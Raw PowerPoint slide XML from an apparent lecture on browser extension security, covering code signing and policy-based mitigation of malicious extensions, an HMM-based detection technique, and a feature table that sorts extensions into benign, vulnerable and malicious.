            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>87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93139" y="1632457"/>
            <a:ext cx="8161655" cy="4231640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287020" marR="677545" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mitigate malicious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extensions </a:t>
            </a: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from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being installed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>or operating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-34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in  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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developed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="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(Louw</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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et</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-11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al.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="200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2006,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="1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Kirda</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-114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et</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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al.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="200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2006)</a:t>
            </a:r>
            <a:endParaRPr sz="20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2500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="100330" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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approach</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-45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relies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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ensuring</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-2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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="5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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-13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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-40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based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> digitally signing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-380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source code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of extensions</a:t>
            </a:r>
            <a:endParaRPr sz="20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2500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" marR="130175" indent="-273685">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>When a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>loads </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extensions, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>it verifies the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>generated </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>signature  with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-40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known</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-2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benign</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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signatures</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-114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conform</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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they</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-100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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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supplied</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>by  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>attackers</a:t>
            </a:r>
            <a:endParaRPr sz="20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2500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" marR="207645" indent="-273685">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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set</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="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global</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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policies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-2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help</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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restrict</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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activities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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performed  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-13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extensions</a:t>
            </a:r>
            <a:endParaRPr sz="20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2500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="95000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="286385" algn="l"/>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Requires </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>modification</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="50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browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-110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enforce</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95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extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-110" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>policy </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>checking resulting up </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>24%</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-325" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>overhead</a:t>
            </a:r>
            <a:endParaRPr sz="20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315466" y="461264"/>
            <a:ext cx="7426959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95780" marR="5080" indent="-1783714">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" spc="-15" dirty="0"/>
              <a:t>Mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-10" dirty="0"/>
              <a:t>techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-10" dirty="0"/>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-15" dirty="0"/>
              <a:t>extensions</a:t>
            </a:r>
            <a:endParaRPr sz="360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6830">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr dirty="0"/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5755" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100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325755" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>Markov </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Model </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>(HMM)‐based</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="38735"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3500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="325755" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="325755" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Learning‐based </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>approach </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>detect </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-385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extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="38735"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Font typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="325755" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="325755" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-125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of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>features</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-120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distinguish</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>between</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35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benign</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-170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extensions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290319" y="308864"/>
            <a:ext cx="7325359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44345" marR="5080" indent="-1732280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" spc="-10" dirty="0"/>
              <a:t>Detection techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-10" dirty="0"/>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-15" dirty="0"/>
              <a:t>extensions</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/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6830">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr dirty="0"/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295222" y="1523822"/>
          <a:ext cx="7696200" cy="507936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38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5910">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="8191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4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Feature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3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB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8255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400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Type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3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="0066CC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="8191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4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Sample</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1400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characteristics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3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="0066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669">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="8191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v0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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="soli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8191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Benign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4290" marB="0">
                    <a:lnL w="3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="soli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81915" marR="73025" indent="-1905" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="93100"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="390"/>
                        </a:spcBef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Visible interfaces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are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present,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user events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initiate functionalities, APIs  render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web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contents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with input filtering, APIs access to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browser and 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local storages for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reading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and writing,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generated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web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requests supply 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information to white listed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="14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websites.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3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="00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5669">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="8191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spc="-5" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>v1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4925" marB="0">
                    <a:lnL w="3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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8191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spc="-15" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Vulnerable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4925" marB="0">
                    <a:lnL w="3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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81915" marR="71755" indent="-2540" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="93100"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="390"/>
                        </a:spcBef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Visible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interfaces may or may not be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present,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user events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may or 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may not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initiate intended functionalities,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APIs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render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web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requests  without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input filtering to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websites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that are not white listed or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related to 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the browser extension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vendor’s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="14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website.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3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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88415">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="8191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v2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3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="soli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8191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Malicious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5560" marB="0">
                    <a:lnL w="3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="soli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81915" marR="72390" indent="-3175" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="93000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="395"/>
                        </a:spcBef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Visible interfaces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are not present, user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events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do not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initiate intended  functionalities,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APIs may or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may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not render web contents with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input  filtering,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APIs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render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web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requests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unknown websites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(not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included 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in white listed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website),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APIs generate new tabs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based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on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information  obtained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from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remote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websites, APIs access to local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storages for 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reading and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="14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writing.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50165" marB="0">
                    <a:lnL w="3175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FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="3175">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="00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48030">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="8191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spc="-5" dirty="0">
                          <a:latin typeface="Arial"/>
